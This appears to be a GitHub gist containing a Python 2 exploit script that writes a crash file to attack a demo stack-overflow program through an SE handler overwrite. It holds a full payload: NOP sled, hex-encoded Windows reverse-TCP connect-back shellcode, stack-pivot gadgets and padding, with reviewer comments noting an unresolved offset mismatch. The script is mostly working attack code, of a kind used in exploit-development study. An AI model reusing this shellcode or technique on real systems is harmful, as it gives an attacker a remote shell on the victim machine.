
@e3prom
Created January 18, 2018 14:54
Demo exploit code for generic-stack-overflow-file.c, a basic stack-based overflow with SE handler pointer overwrite.
# generic-stack-overflow-file-exploit.py
# Sample exploit code for the generic-stack-overflow-file.c, available at:
# https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
#
# Exploitability:
# There is no direct RP overwrite, however we can control the SE handler pointer at offset 808.
# The SE handler pointer points to a stack pivot.
# This exploit is a little bit messy, I do apologize.
import struct
file = 'crash.txt'  # output path; note this shadows the Python 2 builtin `file`
# shellcode is 343 bytes.
# Reverse TCP shellcode (connectback), crafted with love.
# Opaque machine-code literal kept as a Python 2 str (i.e. bytes). By the
# author's own description it embeds the connect-back endpoint, so any file
# carrying this byte sequence is an IoC for the sample. The bytes are not
# decoded here -- TODO(review): confirm length and endpoint by disassembly.
shellcode = "\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x40\x10\x50\x97\xbe\x8e\x4e\x0e\xec\x31\xc9\x41\x60\x8b\x2c\x24\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x30\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x04\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\x85\xc9\x75\x01\xc3\x50\x31\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x89\xe7\x8b\x44\x24\x08\x60\xff\x54\x24\x1c\x68\xde\xad\xc0\xde\x89\x44\x24\x1c\x61\x50\x89\xc7\xbe\xef\x09\xf5\xad\x31\xc9\xe8\x7e\xff\xff\xff\x66\xb9\x21\x02\x29\xc8\x66\xb9\x90\x01\x29\xcc\x89\xe5\x54\x6a\x02\xff\xd0\x31\xc9\x66\xb9\x90\x01\x01\xcc\x58\x31\xc9\x89\xc7\xbe\xd9\x09\xf5\xad\xe8\x54\xff\xff\xff\x50\xbe\xec\xf9\xaa\x60\xe8\x49\xff\xff\xff\x50\x8b\x7c\x24\x14\xbe\x72\xfe\xb3\x16\xe8\x3a\xff\xff\xff\x50\xbe\x7e\xd8\xe2\x73\xe8\x2f\xff\xff\xff\x50\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x54\x24\x24\x89\xc6\x68\x0a\x01\x02\xb1\xb8\x02\x01\x7a\x69\xfe\xcc\x50\x89\xe3\x31\xc0\xb0\x10\x50\x53\x56\xff\x54\x24\x1c\xb8\x31\x63\x6d\x64\xc1\xf8\x08\x50\x54\x31\xc9\xb1\x54\x29\xcc\x89\xe7\x57\x31\xc0\xf3\xaa\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x89\xf0\x8d\x7f\x38\xab\xab\xab\x5f\x31\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x74\x24\x74\x50\xff\x56\x24"
# SE handler pointer overwrite.
# ADD ESP,14 # MOV EAX,1 # POP EBX # POP ESI # RETN 0x0C
# Packed as a little-endian 32-bit value. 0x4019d6 is an address inside the
# target build and is therefore build-specific; no module or base is given here.
seh = struct.pack('<L', 0x4019d6)
# Gadget #1 (this occupies the nSEH slot; see the layout table below)
# The idea here is to make the instruction we've no control of, unharmful.
# The ADD EAX instruction will take the instructions as a simple operand.
# NOP # NOP # ADD EAX [Unwanted instructions/operand]
gadget = "\x90\x90\x81\xc0"
# Gadget #2
# After the return from SEH chain:
# at EBX + 0x18, we've a pointer to our shellcode.
# We can simply increase EBX 24 times, then jump using the pointer at EBX.
# # INC EBX * 24 # JMP [EBX]
gadget2 = "C" * 24 + '\xff\x23'  # 'C' is byte 0x43; 26 bytes in total
nops = "\x90" * 100  # 100-byte NOP sled placed in front of the shellcode
# Filler chosen so that nops + shellcode + padding is exactly 800 bytes,
# whatever the actual shellcode length is (as long as it fits).
padding = 'A' * (800 - len(shellcode + nops))
align = 'B' * 343  # trailing filler, sized to match the stated shellcode length
# File layout implied by the concatenation below (offsets by construction):
#   0..99     nops
#   100..     shellcode (343 bytes per the comment above)
#   ..799     padding
#   800..803  gadget   (nSEH slot)
#   804..807  seh      (handler pointer)
#   808..833  gadget2
#   834..     align
# NOTE(review): the header comment says the handler pointer sits at offset 808,
# whereas by this arithmetic the packed pointer is at file offset 804 --
# presumably the target's read offset differs by 4; confirm before relying on
# either number.
payload = nops + shellcode + padding + gadget + seh + gadget2 + align
f = open(file, 'w')  # text mode; the payload is a Python 2 str
f.write(payload)
print "File", file, "has been created."  # Python 2 print statement
f.close()